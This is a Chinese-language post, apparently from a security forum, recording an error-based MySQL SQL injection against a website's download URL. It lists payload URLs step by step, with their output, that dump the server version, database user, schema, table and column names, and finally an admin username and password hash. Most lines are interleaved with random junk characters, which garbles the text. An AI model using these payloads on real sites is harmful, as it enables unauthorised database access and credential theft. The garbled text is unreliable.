http://www.wooyun.org/bugs/wooyun-2010-01666
( t i$ R1 D- @" D3 K7 b v, L8 C8 q& w& O
! Q9 p9 G* N9 m3 _. U之前想找个测试 没想到这有 可以测试下做个记录而已
' _% e h8 x! L. h" q3 }7 v$ o# X( l. ^6 D9 |7 f/ Y
http://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003
) L% r8 M$ A L4 Q. Y7 ^1 N( `. o' Z
/data0/htdocs/leqi_new/app/myapp.php1 s- ]; Y4 r, G1 b5 |: a+ k1 l5 `
7 } g. R3 K, F3 c6 ^ 或者
0 ]& s2 G3 `! [9 X
9 _% O* D z. }6 M7 I: N/**********version()**********/ 5.1.49-log* w u; l8 _ u# ?# x x
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
3 U |* M& ?4 R/ U1 Z1 c2 n f8 c9 `, R5 u, h" W/ ^
/**********user()**********/
9 C2 J' Y- t6 l6 P) d7 Uhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003* A- ^1 d! |1 u
& U6 R5 q/ V; q7 M8 m8 C
/**********database()**********/ leqi k; l$ X2 w0 }0 s6 I1 h8 e
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
9 j4 }5 W _' y+ l
9 l( i" Z) u5 v+ o* R/**********limit依次递归爆库**********/- G K2 J" Y! X/ m1 K
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
0 |: |! E! j' D/ F" ]7 e* f' cinformation_schema
9 h0 Q% d5 J* G P; p8 \http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
: N0 D/ Z# Z( e# aleqi$ L* h$ g, v8 S6 C
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
6 u6 W1 u. ~/ g0 E9 `7 _) ]. Y E& Etest
1 ]4 l2 b) }$ H" Q: n$ ^ [& B9 Y( d: l, z. n3 S2 I7 X+ J
/**********limit依次递归爆表名**********/$ {5 h! u% T$ d1 ~
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0032 R4 j$ n5 A! x& }
users5 u1 W+ T8 u# r5 r9 [
! |: i7 @7 h+ X, ^
/**********limit依次递归爆字段名**********/2 I5 C7 ^' M5 S0 ]
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
: n( {# b; Z ] p' B# X4 Z( X, Quser_id,username,nickname,passwd,group_id# Y1 A; @- |! r
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%238 x* Y& G3 k. ^
/wapc/5000_0005_003
+ Q$ ?! |" B" U/ M: h0 B11 21
$ l) g# [6 \. f, r' y+ x$ Mhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/ Q+ k5 v5 t! W s4 K
/wapc/5000_0005_003, C" t* L& [5 f( m( s
11 341 351 361
/ g" O7 h# y1 {6 |/**********爆数据**********/
- H5 E, l$ Q( p+ {& x/ @http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%239 |$ ]+ F; J+ I$ t) u9 n& s
admin4 J4 }7 h- I2 V4 b
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
) g4 L2 {5 G7 f' M1 \6a8b4574ca231eb8bd52764d4978ffcd' y0 ]- _; o' w' X1 i i
! M9 o. t( `+ r/ @: P, s
5 g; c1 G$ e2 g0 x" h |